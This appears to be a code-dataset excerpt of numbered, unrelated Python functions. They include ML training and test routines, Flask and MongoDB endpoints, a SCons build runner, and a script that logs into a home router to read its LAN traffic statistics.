    # whose shape[0] is not a concrete integer)
    return len(x)
23,978
def inf_compress_idb(*args): """ inf_compress_idb() -> bool """ return _ida_ida.inf_compress_idb(*args)
23,979
def tokens_history(corpus_id): """ History of changes in the corpus :param corpus_id: ID of the corpus """ corpus = Corpus.query.get_or_404(corpus_id) tokens = corpus.get_history(page=int_or(request.args.get("page"), 1), limit=int_or(request.args.get("limit"), 20)) return render_template_with_nav_info('main/tokens_history.html', corpus=corpus, tokens=tokens)
23,980
def find_pattern_clumps(
    text: str, substring_length: int, window_length: int, minimum_frequency: int
):
    """Find substrings that form "clumps" in the text.

    A substring of length ``substring_length`` forms a clump if it occurs at
    least ``minimum_frequency`` times inside some window of ``window_length``
    characters of ``text``.

    Returns:
        set: The set of all clump-forming substrings.
    """
    patterns = set()
    for index in range(len(text) - window_length + 1):
        window = text[index : index + window_length]
        freq_map = get_frequency_map(text=window, substring_length=substring_length)
        for key, value in freq_map.items():
            if value >= minimum_frequency:
                patterns.add(key)
    return patterns
23,981
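A tiny worked example, under the assumption that get_frequency_map (defined elsewhere in the module) counts overlapping substrings of the given length inside the window:

text = "abcabcabcx"
# Every length-10 window is the whole string here, and "abc" occurs 3 times in it,
# so with minimum_frequency=3 the only reported clump should be "abc".
clumps = find_pattern_clumps(
    text, substring_length=3, window_length=10, minimum_frequency=3
)
print(clumps)   # expected: {'abc'}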
def Hidden(request):
    """
    Hidden Field with a visible friend.
    """
    schema = schemaish.Structure()
    schema.add('Visible', schemaish.String())
    schema.add('Hidden', schemaish.String())

    form = formish.Form(schema, 'form')
    form['Hidden'].widget = formish.Hidden()
    return form
23,982
def train_and_eval(trial: optuna.Trial, study_dir: str, seed: int): """ Objective function for the Optuna `Study` to maximize. .. note:: Optuna expects only the `trial` argument, thus we use `functools.partial` to sneak in custom arguments. :param trial: Optuna Trial object for hyper-parameter optimization :param study_dir: the parent directory for all trials in this study :param seed: seed value for the random number generators, pass `None` for no seeding :return: objective function value """ # Synchronize seeds between Optuna trials pyrado.set_seed(seed) # Load the data data_set_name = "oscillation_50Hz_initpos-0.5" data = pd.read_csv(osp.join(pyrado.PERMA_DIR, "time_series", f"{data_set_name}.csv")) if data_set_name == "daily_min_temperatures": data = to.tensor(data["Temp"].values, dtype=to.get_default_dtype()).view(-1, 1) elif data_set_name == "monthly_sunspots": data = to.tensor(data["Sunspots"].values, dtype=to.get_default_dtype()).view(-1, 1) elif "oscillation" in data_set_name: data = to.tensor(data["Positions"].values, dtype=to.get_default_dtype()).view(-1, 1) else: raise pyrado.ValueErr( given=data_set_name, eq_constraint="'daily_min_temperatures', 'monthly_sunspots', " "'oscillation_50Hz_initpos-0.5', or 'oscillation_100Hz_initpos-0.4", ) # Dataset data_set_hparam = dict( name=data_set_name, ratio_train=0.7, window_size=trial.suggest_int("dataset_window_size", 1, 100), standardize_data=False, scale_min_max_data=True, ) dataset = TimeSeriesDataSet(data, **data_set_hparam) # Policy policy_hparam = dict( dt=0.02 if "oscillation" in data_set_name else 1.0, hidden_size=trial.suggest_int("policy_hidden_size", 2, 51), obs_layer=None, activation_nonlin=fcn_from_str( trial.suggest_categorical("policy_activation_nonlin", ["to_tanh", "to_sigmoid"]) ), mirrored_conv_weights=trial.suggest_categorical("policy_mirrored_conv_weights", [True, False]), conv_out_channels=1, conv_kernel_size=None, conv_padding_mode=trial.suggest_categorical("policy_conv_padding_mode", ["zeros", "circular"]), tau_init=trial.suggest_loguniform("policy_tau_init", 1e-2, 1e3), tau_learnable=True, kappa_init=trial.suggest_categorical("policy_kappa_init", [0, 1e-4, 1e-2]), kappa_learnable=True, potential_init_learnable=trial.suggest_categorical("policy_potential_init_learnable", [True, False]), init_param_kwargs=trial.suggest_categorical("policy_init_param_kwargs", [None, dict(bell=True)]), use_cuda=False, ) policy = NFPolicy(spec=EnvSpec(act_space=InfBoxSpace(shape=1), obs_space=InfBoxSpace(shape=1)), **policy_hparam) # Algorithm algo_hparam = dict( windowed=trial.suggest_categorical("algo_windowed", [True, False]), max_iter=1000, optim_class=optim.Adam, optim_hparam=dict( lr=trial.suggest_uniform("optim_lr", 5e-4, 5e-2), eps=trial.suggest_uniform("optim_eps", 1e-8, 1e-5), weight_decay=trial.suggest_uniform("optim_weight_decay", 5e-5, 5e-3), ), loss_fcn=nn.MSELoss(), ) csv_logger = create_csv_step_logger(osp.join(study_dir, f"trial_{trial.number}")) algo = TSPred(study_dir, dataset, policy, **algo_hparam, logger=csv_logger) # Train without saving the results algo.train(snapshot_mode="latest", seed=seed) # Evaluate num_init_samples = dataset.window_size _, loss_trn = TSPred.evaluate( policy, dataset.data_trn_inp, dataset.data_trn_targ, windowed=algo.windowed, num_init_samples=num_init_samples, cascaded=False, ) _, loss_tst = TSPred.evaluate( policy, dataset.data_tst_inp, dataset.data_tst_targ, windowed=algo.windowed, num_init_samples=num_init_samples, cascaded=False, ) return loss_trn
23,983
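The docstring notes that Optuna only passes the trial object, so the extra arguments are typically bound with functools.partial. Below is a minimal driver sketch under that assumption; the study name and directory are illustrative, not taken from the original project.

import functools
import optuna

# Bind the non-trial arguments, then let Optuna minimise the returned training loss.
study_dir = "./optuna/tspred_study"          # illustrative path
objective = functools.partial(train_and_eval, study_dir=study_dir, seed=1001)

study = optuna.create_study(direction="minimize", study_name="tspred_hpo")
study.optimize(objective, n_trials=50)
print(study.best_params)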
def my_function(my_arg, my_other_arg): """A function just for me. """ pass
23,984
def random_active_qubits(nqubits, nmin=None, nactive=None): """Generates random list of target and control qubits.""" all_qubits = np.arange(nqubits) np.random.shuffle(all_qubits) if nactive is None: nactive = np.random.randint(nmin + 1, nqubits) return list(all_qubits[:nactive])
23,985
def main(host: str, username: str, password: str):
    """Main.

    Args:
        host: Host name or IP address
        username: User name
        password: Password
    """
    url: str = f"http://{host}/"
    rlogintoken: re.Pattern = re.compile(r"creatHiddenInput\(\"Frm_Logintoken\", *\"(\d+)\"\)")
    rloginchecktoken: re.Pattern = re.compile(r"creatHiddenInput\(\"Frm_Loginchecktoken\", *\"(\d+)\"\)")
    s: requests.Session = requests.Session()
    res: requests.Response = s.get(url)
    m: typ.Optional[re.Match] = rlogintoken.search(res.text)
    if m is None:
        print("error 1")
        return 1
    logintoken: str = m[1]
    m = rloginchecktoken.search(res.text)
    if m is None:
        print("error 2")
        return 2
    loginchecktoken: str = m[1]
    pwd_random: int = round(random.random() * 89999999) + 10000000
    before_password = hashlib.md5(f"{password}{pwd_random}".encode("utf-8")).hexdigest()
    params: typ.Dict[str, str] = {}
    params["action"] = "login"
    params["Username"] = username
    params["Password"] = before_password
    params["Frm_Logintoken"] = logintoken
    params["UserRandomNum"] = str(pwd_random)
    params["Frm_Loginchecktoken"] = loginchecktoken
    res2: requests.Response = s.post(url, data=params, allow_redirects=False)
    if res2.status_code != 302:
        print("error 3")
        return 3
    res3: requests.Response = s.get(f"{url}getpage.gch?pid=1002&nextpage=pon_status_lan_link_info_t.gch")
    if res3.status_code != 200:
        print("error 4")
        return 4
    # Column headers exactly as they appear on the device's Japanese status page;
    # they are left untranslated so that matching against the scraped HTML keeps working.
    columns: typ.List[str] = [
        "ポート名",
        "受信したデータ量(byte)",
        "受信したパケットの総数",
        "マルチキャストパケットの受信数",
        "ブロードキャストパケットの受信数",
        "送信したデータ量(byte)",
        "送信されたパケットの総数",
        "マルチキャストパケットの送信数",
        "ブロードキャストパケットの送信数",
    ]
    indexdic: typ.Dict[str, int] = {}
    for i, c in enumerate(columns):
        indexdic[c] = i
    print(", ".join(columns))
    soup = BeautifulSoup(res3.text, "html.parser")
    index: int = -1
    values: typ.List = []
    for td in soup.find_all("td"):
        if index != -1:
            values[index] = td.text.strip()
            index = -1
        else:
            index = indexdic.get(td.text.strip(), -1)
            if index == 0:
                if len(values) > 0:
                    print(", ".join(values))
                values = [""] * len(columns)
    if len(values) > 0:
        print(", ".join(values))
23,986
def create_label(project_id: int, label_name: str, templates: list, session=konfuzio_session()) -> List[dict]: """ Create a Label and associate it with templates. If no templates are specified, the label is associated with the first default template of the project. :param project_id: Project ID where to create the label :param label_name: Name for the label :param templates: Templates that use the label :param session: Session to connect to the server :return: Label ID in the Konfuzio APP. """ url = get_create_label_url() if len(templates) == 0: prj_templates = get_project_templates() default_template = [t for t in prj_templates if t['is_default']][0] templates_ids = [default_template['id']] else: templates_ids = [template.id for template in templates] data = {"project": project_id, "text": label_name, "templates": templates_ids} r = session.post(url=url, data=data) assert r.status_code == requests.codes.created, f'Status of request: {r}' label_id = r.json()['id'] return label_id
23,987
def home(): """ Home page """ return render_template("index.html")
23,988
def test_all(): """ #### python test.py test_utils """ def test_logs(): from utilmy.utils import log,log2, logw, loge, logger_setup print("testing logs utils........") logger_setup() log("simple log ") log2("debug log") logw("warning log") loge("error log") def config_load_test(): from utilmy.utils import config_load config_load() def dataset_download_test(): from utilmy.utils import dataset_donwload dataset_donwload("https://github.com/arita37/mnist_png/raw/master/mnist_png.tar.gz", './testdata/tmp/test/dataset/') def os_extract_archive_test(): from utilmy.utils import os_extract_archive os_extract_archive("./testdata/tmp/test/dataset/mnist_png.tar.gz","./testdata/tmp/test/dataset/archive/", archive_format = "auto") def to_file_test(): from utilmy.utils import to_file to_file("to_file_test_str", "./testdata/tmp/test/to_file.txt") test_logs() config_load_test() dataset_download_test() os_extract_archive_test() to_file_test()
23,989
def get_argparser():
    """Argument parser"""
    parser = argparse.ArgumentParser(description='Bort pretraining example.')
    parser.add_argument('--num_steps', type=int, default=20,
                        help='Number of optimization steps')
    parser.add_argument('--num_eval_steps', type=int, default=None,
                        help='Number of eval steps')
    parser.add_argument('--num_buckets', type=int, default=10,
                        help='Number of buckets for variable length sequence sampling')
    parser.add_argument('--dtype', type=str, default='float16', help='data dtype')
    parser.add_argument('--batch_size', type=int, default=8, help='Batch size per GPU.')
    parser.add_argument('--accumulate', type=int, default=1,
                        help='Number of batches for gradient accumulation. '
                             'The effective batch size = batch_size * accumulate.')
    parser.add_argument('--use_avg_len', action='store_true',
                        help='Use average length information for the bucket sampler. '
                             'The batch size is approximately the number of tokens in the batch')
    parser.add_argument('--batch_size_eval', type=int, default=8,
                        help='Batch size per GPU for evaluation.')
    parser.add_argument('--dataset_name', type=str, default='book_corpus_wiki_en_uncased',
                        choices=['book_corpus_wiki_en_uncased', 'book_corpus_wiki_en_cased',
                                 'wiki_multilingual_uncased', 'wiki_multilingual_cased',
                                 'wiki_cn_cased', 'openwebtext_ccnews_stories_books_cased'],
                        help='The pre-defined dataset from which the vocabulary is created. '
                             'Default is book_corpus_wiki_en_uncased.')
    parser.add_argument('--pretrained', action='store_true',
                        help='Load the pretrained model released by Google.')
    parser.add_argument('--model', type=str, default='bort_4_8_768_1024',
                        choices=[b for b in bort.predefined_borts.keys()],
                        help='Model to run pre-training on. ')
    parser.add_argument('--teacher_model', type=str, default='roberta_24_1024_16',
                        help='Model to run as teacher on. '
                             'Options are bert_12_768_12, bert_24_1024_16, roberta_24_1024_16, roberta_12_768_12, '
                             'others on https://gluon-nlp.mxnet.io/model_zoo/bert/index.html')
    parser.add_argument('--teacher_ckpt_dir', type=str, default=None,
                        help='Path to teacher checkpoint directory')
    parser.add_argument('--teacher_ce_weight', type=float, default=0.0,
                        help='weight to mix teacher_ce_loss with '
                             'mlm_loss: should be in range (0,1)')
    parser.add_argument('--distillation_temperature', type=float, default=1.0,
                        help='temperature for teacher/student '
                             'distillation')
    parser.add_argument('--mlm_weight', type=float, default=1.0,
                        help='weight to mix teacher_ce_loss with mlm_loss: '
                             'should be in range (0,1)')
    parser.add_argument('--data', type=str, default=None,
                        help='Path to training data. Training is skipped if not set.')
    parser.add_argument('--data_eval', type=str, required=True,
                        help='Path to evaluation data. '
                             'Evaluation is skipped if not set.')
    parser.add_argument('--ckpt_dir', type=str, default='./ckpt_dir',
                        help='Path to checkpoint directory')
    parser.add_argument('--start_step', type=int, default=0,
                        help='Start optimization step from the checkpoint.')
    parser.add_argument('--lr', type=float, default=1e-4, help='Learning rate')
    parser.add_argument('--warmup_ratio', type=float, default=0.01,
                        help='ratio of warmup steps used in NOAM\'s stepsize schedule')
    parser.add_argument('--log_interval', type=int, default=250, help='Report interval')
    parser.add_argument('--ckpt_interval', type=int, default=1000, help='Checkpoint interval')
    parser.add_argument('--verbose', action='store_true', help='verbose logging')
    parser.add_argument('--profile', type=str, default=None,
                        help='output profiling result to the target file')
    parser.add_argument('--cpu_only', action='store_true', help='force to only use cpu')
    return parser
23,990
def get_from_parameterdata_or_dict(params,key,**kwargs): """ Get the value corresponding to a key from an object that can be either a ParameterData or a dictionary. :param params: a dict or a ParameterData object :param key: a key :param default: a default value. If not present, and if key is not present in params, a KeyError is raised, as in params[key] :return: the corresponding value """ if isinstance(params,ParameterData): params = params.get_dict() if 'default' in kwargs: return params.get(key,kwargs['default']) else: return params[key]
23,991
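A behaviour sketch using a plain dict; an AiiDA ParameterData node would simply be unwrapped via get_dict() first, as the function body shows. The key names are illustrative only.

params = {"ecutwfc": 30.0}

print(get_from_parameterdata_or_dict(params, "ecutwfc"))                 # 30.0
print(get_from_parameterdata_or_dict(params, "ecutrho", default=240.0))  # 240.0
# Without a default, a missing key raises KeyError, mirroring params[key]:
# get_from_parameterdata_or_dict(params, "ecutrho")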
def notice(callingObject, noticeString): """Prints a formatted notice in the terminal window that includes the name of the source. callingObject -- the instance object making the call noticeString -- the message to be printed For now this function just prints to the terminal, but eventually it could publish to a browser-based interface etc... """ print("[" + objectIdentifier(callingObject) + "] " + str(noticeString))
23,992
def test_simple(): """ Test that a simple EIGENVAL from AFLOW can parse ref: http://aflowlib.duke.edu/AFLOWDATA/LIB1_RAW/B_s:GGA:01Apr2000/A2/ """ lines = """ 1 1 1 1 0.6187200E+01 0.2003113E-09 0.2003113E-09 0.2003113E-09 0.5000000E-15 1.000000000000000E-004 CAR B_s.A2 128 768 6 0.0000000e+00 0.0000000e+00 0.0000000e+00 1.3020830e-03 1 -7.71880 2 26.05280 3 26.05280 4 26.05430 5 44.93560 6 44.93560 """.split("\n") parser = EigenvalParser() results = list([x for x in parser.parse(lines) if len(x) > 0]) # Test k-point info assert len(results) == 1, "Expected one k-point" assert all(abs(x) < 1.0e-9 for x in results[0]['kpoint']), "First k-point should be zero" # Test weights assert results[0]['weight'] == 1.3020830e-03 # Test energies assert len(results[0]['energies'][2]) == 1, "Expected a single spin" assert results[0]['energies'][2][0] == 26.05280, "Band energy was parsed incorrectly" # Test occupancies assert all("occupancies" not in x for x in results), "Shouldn't parse occupancies"
23,993
def test_input_type(temp_files, fsdp_config, input_cls): """Test FSDP with input being a list or a dict, only single GPU.""" if torch_version() < (1, 7, 0): # This test runs multiple test cases in a single process. On 1.6.0 it # throw an error like this: # RuntimeError: Container is already initialized! Cannot initialize it twice! pytest.skip("older pytorch doesn't work well with single process dist_init multiple times") result = dist_init(rank=0, world_size=1, filename=temp_files[0], filename_rpc=temp_files[1]) assert result, "Dist init failed" assert isinstance(fsdp_config, dict), str(fsdp_config) class Model(Module): def __init__(self): super().__init__() self.layer = Linear(4, 4) def forward(self, input): if isinstance(input, list): input = input[0] else: assert isinstance(input, dict), input input = input["in"] return self.layer(input) model = FSDP(Model(), **fsdp_config).cuda() optim = SGD(model.parameters(), lr=0.1) for _ in range(5): in_data = torch.rand(64, 4).cuda() in_data.requires_grad = True if input_cls is list: in_data = [in_data] else: assert input_cls is dict in_data = {"in": in_data} out = model(in_data) out.sum().backward() optim.step() optim.zero_grad() model.assert_state(TrainingState.IDLE) teardown()
23,994
def call_scons(build_options, scons_options): """ Format and run a single scons command. Args: build_options (dict): build flags with values. scons_options (str): additional flags to scons. """ cmd_line = "scons VERBOSE=" + VERBOSE for key in build_options: cmd_line += " " + key + "=" + str(build_options[key]) cmd_line += " " + str(scons_options) if not EXEC_MODE: print ("Would run : " + cmd_line) else: print ("Running : " + cmd_line) sys.stdout.flush() exit_code = subprocess.Popen(cmd_line, shell=True).wait() if exit_code != 0: sys.exit(exit_code)
23,995
def get_heroesplayed_players(matchs_data, team_longname): """Returns a dict linking each player to - the heroes he/she played - if it was a win (1) or a loss (0) """ picks = get_picks(matchs_data, team_longname) players = get_players(picks) results = get_results(matchs_data, team_longname) heroes_played = {item: [[], []] for item in players} for pl in players: i = 0 for rd in picks: if pl in rd.keys(): heroes_played[pl][0].append(rd[pl]) if results[i] == 1: heroes_played[pl][1].append(1) else: heroes_played[pl][1].append(0) i += 1 return heroes_played
23,996
def autofmt(filename, validfmts, defaultfmt=None):
    """Infer the format of a file from its filename.

    By convention, the format can be forced by prefixing the filename with the
    format followed by a colon (e.g. "fmt:filename").

    `validfmts` is a list of acceptable file formats
    `defaultfmt` is the format to use if the extension is not on the valid list

    returns `filename`,`fmt`
    """
    colonix = filename.find(":")
    if colonix != -1:
        extension = filename[:colonix]
        filename = filename[(colonix+1):]
    else:
        extension = None
    for validfmt in validfmts:
        if filename.endswith(validfmt):
            extension = filename[-len(validfmt):]
    return filename, (extension.lower() if extension in validfmts else defaultfmt)
23,997
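A few illustrative calls (the format names are invented), showing the prefix override, suffix sniffing, and the default fallback as the function above behaves:

valid = ["csv", "tsv", "json"]

print(autofmt("data.csv", valid))           # ('data.csv', 'csv')
print(autofmt("json:export.dat", valid))    # ('export.dat', 'json')  forced via prefix
print(autofmt("notes.txt", valid, "csv"))   # ('notes.txt', 'csv')    falls back to defaultfmt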
def RunPredator():
  """Runs delta testing between 2 different Findit versions."""
  argparser = argparse.ArgumentParser(
      description='Run Predator on a batch of crashes.')
  argparser.add_argument(
      '--input-path',
      dest='input_path',
      default=None,
      help='Path to read a list of ``CrashAnalysis`` entities')
  argparser.add_argument(
      '--result-path',
      dest='result_path',
      default=None,
      help='Path to store results')
  argparser.add_argument(
      '--key', '-k',
      default=None,
      help='Key to one single crash.')
  argparser.add_argument(
      '--client', '-c',
      default='cracas',
      help=('Type of client data the delta test is running on, '
            'possible values are: fracas, cracas, clusterfuzz. '
            'Right now, only fracas data is available'))
  argparser.add_argument(
      '--app', '-a',
      default=os.getenv('APP_ID', 'predator-for-me-staging'),
      help=('App id of the App engine app that query needs to access. '
            'Defaults to predator-for-me-staging. You can also set environment '
            'variable by \'export APP_ID=your-app-id\' to replace '
            'the default value.\nNOTE, only appspot app ids are supported, '
            'the app_id of googleplex app will have access issues '
            'due to internal proxy. '))
  argparser.add_argument(
      '--verbose', '-v',
      action='store_true',
      default=False,
      help='Print Predator results.')
  args = argparser.parse_args()

  if args.input_path:
    with open(args.input_path) as f:
      crashes = pickle.loads(zlib.decompress(f.read()))
  elif args.key:
    remote_api.EnableRemoteApi(app_id=args.app)
    crashes = {args.key: ndb.Key(urlsafe=args.key).get()}

  if not crashes:
    logging.error('Failed to get crashes info.')
    return

  culprits = GetCulprits(crashes, args.client, args.app, args.verbose)

  if args.result_path:
    script_util.FlushResult(culprits, args.result_path)
23,998
def get_or_add_dukaan(): """ Add a new business """ if request.method == "POST": payload = request.json # payload = change_case(payload, "lower") business = db.dukaans.find_one({"name": payload["name"]}) if business is not None: return ( jsonify( { "success": False, "message": "Business name already exists, Please choose another name.", } ), 400, ) for required_key in business_schema: if required_key not in payload.keys(): return jsonify({"message": f"Missing {required_key} parameter"}), 400 db.dukaans.insert_one(payload) return jsonify({"success": True, "dukaan": clean_dict_helper(payload)}), 201 dukaans = list(db.dukaans.find({}).limit(5)) for dukaan in dukaans: if len(dukaan.get("categories", [])) > 0: dukaan["categories"] = [ db.categories.find_one({"_id": ObjectId(_id)})["name"] for _id in dukaan["categories"] ] ratings = list(db.ratings.find({"business": str(dukaan["_id"])}, {"rating": 1})) if len(ratings) > 0: ratings_sum = sum([r["rating"] for r in ratings]) dukaan["avg_rating"] = float(ratings_sum) / float(len(ratings)) else: dukaan["avg_rating"] = 0.0 return jsonify({"success": True, "dukaans": clean_dict_helper(dukaans)})
23,999